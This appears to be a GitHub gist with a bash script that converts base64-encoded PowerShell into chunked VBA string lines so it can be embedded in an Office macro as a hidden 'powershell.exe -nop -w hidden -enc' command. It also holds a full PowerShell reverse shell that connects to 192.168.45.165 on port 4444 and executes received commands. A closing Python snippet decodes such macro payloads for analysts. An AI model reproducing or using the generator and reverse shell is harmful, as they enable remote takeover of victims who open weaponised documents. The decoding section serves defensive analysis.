@plmi
Last active December 19, 2025 15:36
Make a PowerShell script compatible to use in VBA (Microsoft Office Macro)
#!/usr/bin/env bash
# Description: Convert a base64 encoded PowerShell command to a VBA expression that bypasses the 255 character limit.
# Usage 1: cat reverse-shell.ps1 | iconv -t UTF-16LE | base64 -w 0 | ./powershell-to-macro.sh
# Usage 2: ./powershell-to-macro.sh -c "<base64 encoded powershell command>"
set -euo pipefail
usage() {
    echo "Usage: $0 [-c string]"
    echo " echo 'text' | $0"
    exit 1
}
# Must be UTF-16LE
COMMAND_BASE64=""
# Parse options
while getopts ":c:" opt; do
    case "$opt" in
        c)
            COMMAND_BASE64="$OPTARG"
            ;;
        *)
            usage
            ;;
    esac
done
# If -c was not provided, check for piped input
if [[ -z "$COMMAND_BASE64" ]]; then
    if [[ ! -t 0 ]]; then
        # stdin is being piped
        COMMAND_BASE64="$(cat)"
    else
        usage
    fi
fi
COMMAND_BASE64="powershell.exe -nop -w hidden -enc $COMMAND_BASE64"
COMMAND_LENGTH=${#COMMAND_BASE64}
LINE_LENGTH=50
for (( i=0; i<COMMAND_LENGTH; i+=LINE_LENGTH )); do
    CHUNK=${COMMAND_BASE64:i:LINE_LENGTH}
    echo "Str = Str + \"${CHUNK}\""
done

$client = New-Object System.Net.Sockets.TCPClient('192.168.45.165', 4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
    $data = ([System.Text.Encoding]::ASCII).GetString($bytes, 0, $i);
    $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String);
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([System.Text.Encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte, 0, $sendbyte.Length);
    $stream.Flush();
}
$client.Close();
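
For analysts who find this pattern in a document, the chunked `Str = Str + "..."` lines can be reassembled and the `-enc` argument decoded (base64 over UTF-16LE) without executing anything. The following is an added example, not part of the original gist; the function names and the sample macro text are hypothetical and constructed for illustration.

```python
import base64
import re

# Constructed sample: "whoami" as UTF-16LE base64, split into 50-character chunks.
SAMPLE_MACRO = '''Sub Example()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -enc dwBoAG8AYQBtAGk"
    Str = Str + "A"
End Sub'''

# VBA assignment of a quoted literal, optionally appended to a variable with + or &.
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(?:(\w+)\s*[+&]\s*)?"((?:[^"]|"")*)"\s*$')
FLAGS = {"hidden window": r"-w\w*\s+hidden", "no profile": r"-nop\w*"}

def reassemble(vba_source):
    """Rebuild each string variable that is assembled chunk by chunk."""
    strings = {}
    for line in vba_source.splitlines():
        m = ASSIGN.match(line)
        if m:
            name, prev = m.group(1).lower(), (m.group(2) or "").lower()
            base = strings.get(name, "") if prev == name else ""
            strings[name] = base + m.group(3).replace('""', '"')
    return strings

def encoded_arg(cmdline):
    """Return the value following -enc or any other prefix of -EncodedCommand (or -ec)."""
    toks = cmdline.split()
    for flag, arg in zip(toks, toks[1:]):
        opt = flag[1:].lower()
        if flag.startswith("-") and opt and ("encodedcommand".startswith(opt) or opt == "ec"):
            return arg
    return None

def analyze(vba_source):
    """List reassembled PowerShell command lines with their decoded payloads."""
    findings = []
    for name, value in reassemble(vba_source).items():
        if "powershell" not in value.lower():
            continue
        try:
            decoded = base64.b64decode(encoded_arg(value) or "", validate=True).decode("utf-16-le")
        except ValueError:  # bad base64 or not UTF-16LE
            decoded = None
        flags = sorted(k for k, rx in FLAGS.items() if re.search(rx, value, re.I))
        findings.append({"variable": name, "flags": flags, "decoded": decoded or None})
    return findings

if __name__ == "__main__":
    print(analyze(SAMPLE_MACRO))
```

The same decoded text is what PowerShell script block logging would record at execution time, so the output can be matched against endpoint telemetry.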